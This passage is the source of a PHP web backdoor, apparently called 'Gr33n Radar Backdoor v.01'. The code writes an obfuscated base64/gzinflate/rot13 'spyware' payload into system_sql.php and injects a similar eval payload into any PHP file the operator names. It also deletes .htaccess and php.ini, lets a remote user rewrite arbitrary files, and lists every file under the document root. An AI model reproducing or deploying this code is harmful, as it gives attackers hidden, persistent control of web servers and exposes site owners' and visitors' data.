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'))))); ?>
";
$write = fopen("system_sql.php", 'a');
fwrite($write, "$spyware_code");
fclose($write);
print '<script>alert("spyware installed!")</script>';
header( "refresh:1;url=$myname?backdoor=activation");
}
/*---------------*/
/*| File to Spy |*/
/*---------------*/
if (isset($_GET['filespy'])) {
print '<center><br><a href="?backdoor=activation">
<button style="background-color:#00ffff">~Home</button></a>
<br><div style="width:300px; height:50px; border:1px solid lime;">
<font color="lime">
Enter the name of the file to spy on [allowed only PHP files]</font></div><br>';
echo' <center><form action="'.$SERVER[PHP_SELF].'" method="POST">
<input type="text" style="background-color:#00ffff" name="filenspy" value="filename.php">
<input type="submit" value="select" style="background-color:#00ffff">
</form>';
}
if (isset($_POST['filenspy'])) {
$filenspy = $_POST['filenspy'];
print "$filenspy now is under control!<br>";
/*---------------*/
/*| including |*/
/*---------------*/
$inc_me = "eval(str_rot13(gzinflate(str_rot13(base64_decode('LRXFDqxL9ng63bPDJbMqHAqn
0M0Eamq+fi4vWgL3XI77RQ/3P1t/xOs9lMs/40MsBPa/bJmSbPknH5oqv/+9/P3VBLRCxMJEub
oldoeT8K7V/F5s/EYX6Lbjnwq9/0+cZRgWFU2OKe27HtxGik+gLPgLMVkqOZpUAv91sY74RIzA
X+cue
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')))));
";
/*--------------------------*/
/*| Writing victime File |*/
/*--------------------------*/
rename("$filenspy", "$filenspy.txt");
$target_xy = "3";
$statszx = file("$filenspy.txt", FILE_IGNORE_NEW_LINES);
$offsetbc = array_search($target_xy,$statszx) +1;
array_splice($statszx, $offsetbc, 0, "$inc_me");
file_put_contents("$filenspy.txt", join("\n", $statszx));
$format_erasex = str_replace(".txt", "", "$filenspy.txt");
rename("$filenspy.txt", "$format_erasex");
}
/*---------------------------------------------------------------------------------------------------------*/
/* END */
/*---------------------------------------------------------------------------------------------------------*/
//__________________________________________________________________________________
//| |######################| |
//| |# Backdoor Safe_Mode #| |
//| |######################| |
//|_________________________________________________________________________________|
if (isset($_GET['sm_editor'])) {
print '<center><div style="width:400px; height:100px; border:1px solid red;">';
print "<font color='red'><h2>Welcome To Safe_Mode</h2>
<small>Gr33n Radar Backdoor v.01</small></font><br></div>";
print "<div style='float: center; text-align: center;'>
<a href='?sm_editor=on'><button style='background-color: aqua;color:#ff0000;'>~Back</button></a>
</div></center><br>";
//deleting security files
if (false!==file(".htaccess")) unlink(".htaccess");
else echo "";
if (false!==file("php.ini")) unlink("php.ini");
else echo "";
//For run File editor <-- backdoor_name.php?sm_editor=on -->
//#Editor
echo'<center><font color="red">Edit File:</font>
<form action="'.$SERVER[PHP_SELF].'" method="GET" style="text-align: center;">
<input type="hidden" name="sm_editor" value="activation">
<input type="text" style="background-color: aqua;color:#ff0000;" name="file_to_edit" value="filename_to_edit.php"><br>
<input type="submit" style="background-color: aqua;color:#ff0000;" value="execute"></form><br>';
if(isset($_GET['file_to_edit'])) {
$file_to_edit = $_GET['file_to_edit'];
?>
<form action="<?php basename($_SERVER['PHP_SELF']) ?>" method="GET" style="text-align: center;">
<input type="hidden" name="sm_editor" value="activation">
<font color="red">
<input type="text" style="background-color: aqua;color:#ff0000;" name="file_to_edit2" value="<? echo $file_to_edit; ?>"><br>
<textarea name="code" id="editor" cols="30" rows="10" style="width: 90%; height: 70vh; background-color: aqua;color:#ff0000;"><?php echo htmlentities(file_get_contents($file_to_edit)); ?>
</textarea>
</font>
<br>
<input type="submit" style="background-color: aqua;color:#ff0000;" value="Edit" name="Edit">
</form>
<?
}
//editing File
if(!empty($_GET['code']&&$_GET['file_to_edit2'])) {
$codej = $_GET['code'];
$file_to_edit2 = $_GET['file_to_edit2'];
$myfilej = fopen($file_to_edit2, "w") or die("<font color='red'>--Unable to open file--</font>");
fwrite($myfilej, $codej);
fclose($myfilej);
echo "<font color='red'>--File Edited--</font></center>";
}
};
//For run dir explorer <-- backdoor_name.php?sm_exp=on -->
if (isset($_GET['sm_exp'])) {
//File explorer
echo '<center><div style="width:150px; height:50px; border:1px solid red;">
<font color="red">';
echo "~ [Current Directory]<br>";
echo basename(__DIR__);
echo '</font></div><br>';
echo '<center><div style="width:150px; height:20px; border:1px solid red;">
<font color="red">~ [Files]</font>
</div>';
$startfolderj = './';
$filesss=array();
foreach( new RecursiveIteratorIterator( new RecursiveDirectoryIterator( $startfolderj, RecursiveDirectoryIterator::KEY_AS_PATHNAME ), RecursiveIteratorIterator::CHILD_FIRST ) as $filew => $infoz ) {
if( $infoz->isFile() && $infoz->isReadable() ) {
$filesss[]=array('filename'=>$infoz->getFilename(),'path'=>realpath( $infoz->getPathname() ) );
}
}
echo '<pre>',print_r($filesss,true),'</pre>';
};;
//For run root explorer <-- backdoor_name.php?sm_root_exp=on -->
//root Explorer
if (isset($_GET['sm_root_exp'])) {
$startfolderp = $_SERVER['DOCUMENT_ROOT'];
$filesp=array();
foreach( new RecursiveIteratorIterator( new RecursiveDirectoryIterator( $startfolderp, RecursiveDirectoryIterator::KEY_AS_PATHNAME ), RecursiveIteratorIterator::CHILD_FIRST ) as $filep => $infop ) {
if( $infop->isFile() && $infop->isReadable() ){
$filesp[]=array('filename'=>$infop->getFilename(),'path'=>realpath( $infop->getPathname() ) );
}
}
echo '<center><div style="width:150px; height:20px; border:1px solid red;">
<font color="red">~ [All Files]</font></div><br>';
echo '<pre>',print_r($filesp,true),'</center></pre>';
};;;
//__________________________________________________________________________________
//| |##########################| |
//| |# Backdoor Safe_Mode End #| |
//| |##########################| |
//|_________________________________________________________________________________|
?>
</center>
</body>
</html>